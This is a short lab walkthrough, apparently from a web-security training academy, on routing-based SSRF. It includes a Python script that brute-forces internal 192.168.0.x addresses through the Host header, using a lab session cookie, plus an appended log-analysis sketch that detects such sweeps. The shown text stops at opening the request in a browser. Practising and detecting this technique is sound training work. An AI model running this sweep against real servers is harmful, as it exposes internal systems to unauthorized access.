imagine we have this website


let’s intercept the request to this website


as we see we got the 200 OK response from the website

now let’s try to change the Host header to the IP address 192.168.0.1 and see what will happen


as we see we got a 504 Gateway Timeout

let’s send this to Intruder to brute-force the IP


now let’s start our attack

I will script the vulnerability due to an error in Intruder

import requests

# Lab URL: the connection always goes here; only the Host header changes
url = "https://0a42005b0328b6128059766600cf0050.web-security-academy.net/"

# Try 192.168.0.1 through 192.168.0.254 as the Host header value
for i in range(1, 255):
    headers = {
        "Host": f"192.168.0.{i}",
        "Cookie": "session=Ny96CKtVYBXmt7Mybu1KMpASocbNv0pB; _lab=46%7cMCwCFB10fmaJr0VpSZrCKCzXa60ESkhBAhRTmUYf7JxYmfo5FaFsYCE4bov16KHLarsVo2wQx74Psg8OAhW3kOKE9fsaXgq5%2b%2fr1mKH40gr0pp6Z02%2bIiaRuJak46YUx3TASvvFdYMqKcNReggWaBJ%2b0b7AWhgVSTwBjesyESK2x%2bnY%3d",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
    }
    r = requests.get(url, headers=headers)
    # 504 is the response seen above for 192.168.0.1; any other status is treated as a hit
    if r.status_code != 504:
        print(f"Found Valid IP Number: 192.168.0.{i}")
        break


as we see we found a valid IP


okay let’s go

now let’s open the request in the browser
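
Seen from the front end's side, the loop above is one client sending a run of requests whose Host header walks through 192.168.0.x. As an added example (not part of the original write-up), this sketch flags that pattern in access logs; the log format, `ALLOWED_HOSTS`, the sample lines and every function name are assumptions made up for the illustration.

```python
import ipaddress
import re
from collections import defaultdict

ALLOWED_HOSTS = {"shop.example.com"}  # assumption: the only site this front end serves
# Constructed log format: <client> host="<Host header>" status=<code>
LINE_RE = re.compile(r'^(\S+) host="([^"]*)" status=(\d{3})$')

def normalize_host(value):
    """Lower-case the Host value; drop port, IPv6 brackets and trailing dot."""
    host = value.strip().lower()
    if host.startswith("["):
        host = host[1:].split("]", 1)[0]
    elif host.count(":") == 1:
        host = host.split(":", 1)[0]
    return host.rstrip(".")

def internal_literal(value):
    """Return the address if Host is a private/loopback/link-local IP literal, else None."""
    try:
        ip = ipaddress.ip_address(normalize_host(value))
    except ValueError:
        return None  # a name, not an IP literal
    return ip if (ip.is_private or ip.is_loopback or ip.is_link_local) else None

def find_host_sweeps(lines, threshold=3):
    """Flag clients that tried >= threshold distinct internal addresses as Host."""
    tried, answered = defaultdict(set), defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or normalize_host(m.group(2)) in ALLOWED_HOSTS:
            continue
        ip = internal_literal(m.group(2))
        if ip is None:
            continue
        tried[m.group(1)].add(str(ip))
        if m.group(3) != "504":  # non-504: the same signal the script above keys on
            answered[m.group(1)].add(str(ip))
    return {c: {"tried": len(t), "answered": sorted(answered[c])}
            for c, t in tried.items() if len(t) >= threshold}

SAMPLE = [  # constructed log lines, not output from the lab
    '203.0.113.7 host="shop.example.com" status=200',
    '203.0.113.7 host="192.168.0.1" status=504',
    '203.0.113.7 host="192.168.0.2:443" status=504',
    '203.0.113.7 host="192.168.0.3" status=302',
    '198.51.100.9 host="10.0.0.5" status=504',
]
```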
